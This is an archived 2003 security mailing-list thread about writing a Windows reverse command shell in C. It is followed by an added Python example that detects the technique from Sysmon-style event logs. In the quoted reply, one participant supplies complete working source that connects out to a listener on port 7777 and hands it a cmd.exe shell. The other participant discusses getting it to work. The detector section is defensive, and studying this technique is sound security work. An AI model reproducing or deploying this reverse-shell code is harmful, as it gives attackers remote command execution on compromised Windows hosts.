Re[2]: Windows reverse Shell
From: A*** (netninja@hotmail.kg)
Date: 02/05/03
- Previous message: jasonk: "RE: Possible DOS against search engines?"
- In reply to: 3APA3A: "Re: Windows reverse Shell"
- Next in thread: sk: "Re: Windows reverse Shell"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Wed, 5 Feb 2003 15:03:03 +0600
From: A*** <netninja@hotmail.kg>
To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Hello 3APA3A,
Thanks for your code. The one I wrote is absolutely the same without bind.
In fact we don't need "bind", though David Litchfield mentions it in his
Blackhat talk. So anyway, did you try compiling your code? If not you should
try, because I see the same results, i.e. I get a connection on my netcat, but then
it suddenly disconnects. No command prompt.
Tuesday, February 4, 2003, 10:34:56 PM, you wrote:
3> Date: Tue, 4 Feb 2003 19:34:56 +0300
3> From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
3> To: SecFocus <netninja@hotmail.kg>
3> CC: vuln-dev@securityfocus.com
3> Subject: Re: Windows reverse Shell
3> Dear NetNinja,
3> The code below successfully brings a reverse shell to 127.0.0.1:7777.
3> #include <windows.h>
3> #include <winsock2.h>
3> #include <stdio.h>
3> int main(int argc, char* argv[]){
3>     WSADATA wd;
3>     HANDLE h;
3>     SOCKET sock;
3>     STARTUPINFO si;
3>     PROCESS_INFORMATION pi;
3>     struct sockaddr_in sin;
3>     int size = sizeof(sin);
3>     memset(&sin, 0, sizeof(sin));
3>     memset(&si, 0, sizeof(si));
3>     WSAStartup(MAKEWORD( 1, 1 ), &wd);
3>     sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
3>     sin.sin_family = AF_INET;
3>     bind(sock, (struct sockaddr*)&sin, size);
3>     sin.sin_port = htons(7777);
3>     sin.sin_addr.s_addr = inet_addr("127.0.0.1");
3>     connect(sock, (struct sockaddr*)&sin, size);
3>     si.cb = sizeof(si);
3>     si.dwFlags = STARTF_USESTDHANDLES;
3>     si.hStdInput = si.hStdOutput = si.hStdError = sock;
3>     CreateProcess(
3>         NULL,
3>         "cmd.exe",
3>         NULL,
3>         NULL,
3>         TRUE,
3>         0,
3>         0,
3>         NULL,
3>         &si,
3>         &pi
3>     );
3>     return 0;
3> }
3> --Monday, February 3, 2003, 10:37:45 PM, you wrote to vuln-dev@securityfocus.com:
N>> Hello guys,
N>> David Litchfield in his Blackhat talk talked about using the socket handle
N>> from WSASocket() and passing that handle as a parameter for stdin, stdout
N>> and stderr to the CreateProcess function. By doing it this way his reverse
N>> cmd shellcode becomes much smaller. I tried coding that reverse
N>> command shell in C, but couldn't get it to work. It simply connects to
N>> my listening netcat listener and then disconnects. David Litchfield
N>> used 4 functions to achieve that: WSASocket, bind, connect and
N>> CreateProcess. A little help would be appreciated on building this reverse
N>> cmd shell. Thanks.
-- Best regards, A*** mailto:netninja@hotmail.kg
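From the defender's side, the technique discussed in this thread leaves a distinctive host-level trace: a process first initiates an outbound TCP connection and, within a second or so, spawns cmd.exe as a child whose standard handles are the socket. The following is an added example, not code from the thread or from any of its participants. It correlates constructed, Sysmon-style process-creation (event 1) and network-connection (event 3) records to flag exactly that parent-connects-then-spawns-shell sequence; the record format, the field names, the file paths and the five-second window are all assumptions of this example.

```python
"""Flag processes that open an outbound TCP connection and then spawn cmd.exe.

Constructed example: the events below are made up and use field names
modelled on Sysmon event 1 (process creation) and event 3 (network
connection). Nothing here is from the mailing-list thread itself.
"""
from datetime import datetime
from pathlib import PureWindowsPath

# Child images that, when spawned right after a connection, indicate a
# socket-inherited shell. Extend this set if other interpreters are in scope.
SHELL_IMAGES = {"cmd.exe"}

# Constructed sample telemetry (assumption: timestamps are ISO 8601, local).
SAMPLE_EVENTS = [
    # A process connects out to a listener, then spawns cmd.exe one second later.
    {"ts": "2003-02-04T19:34:56", "id": 3, "pid": 1234,
     "image": r"C:\Temp\sample.exe", "dst_ip": "127.0.0.1",
     "dst_port": 7777, "initiated": True},
    {"ts": "2003-02-04T19:34:57", "id": 1, "pid": 1300,
     "image": r"C:\WINDOWS\system32\cmd.exe", "ppid": 1234,
     "parent_image": r"C:\Temp\sample.exe"},
    # Benign: a user opens a prompt from the desktop; no prior connection.
    {"ts": "2003-02-04T19:40:00", "id": 1, "pid": 1400,
     "image": r"C:\WINDOWS\system32\cmd.exe", "ppid": 800,
     "parent_image": r"C:\WINDOWS\explorer.exe"},
    # Benign: a browser connects out but never spawns a shell.
    {"ts": "2003-02-04T19:41:00", "id": 3, "pid": 900,
     "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "dst_ip": "192.0.2.10", "dst_port": 80, "initiated": True},
]


def _ts(value):
    """Parse the constructed ISO 8601 timestamp."""
    return datetime.fromisoformat(value)


def find_socket_shells(events, window_seconds=5):
    """Return (parent_pid, parent_image, child_pid, "ip:port") for each shell
    spawned by a process that initiated an outbound connection within
    `window_seconds` before the spawn."""
    # Index outbound (initiated) connections by the pid that made them.
    conns = {}
    for e in events:
        if e["id"] == 3 and e.get("initiated"):
            conns.setdefault(e["pid"], []).append(e)

    hits = []
    for e in sorted(events, key=lambda x: _ts(x["ts"])):
        if e["id"] != 1:
            continue
        if PureWindowsPath(e["image"]).name.lower() not in SHELL_IMAGES:
            continue
        created = _ts(e["ts"])
        for c in conns.get(e["ppid"], []):
            # Only connections made shortly *before* the child appeared count.
            delta = (created - _ts(c["ts"])).total_seconds()
            if 0 <= delta <= window_seconds:
                hits.append((e["ppid"], e["parent_image"], e["pid"],
                             f'{c["dst_ip"]}:{c["dst_port"]}'))
    return hits


if __name__ == "__main__":
    for hit in find_socket_shells(SAMPLE_EVENTS):
        print("socket-inherited shell suspected:", hit)
```

The correlation key here is the numeric parent PID, which is enough for a self-contained sample; on a real host PIDs are reused, so a production rule should key on the process GUID that Sysmon attaches to both event types, and the time window should be tuned to the host's normal behaviour.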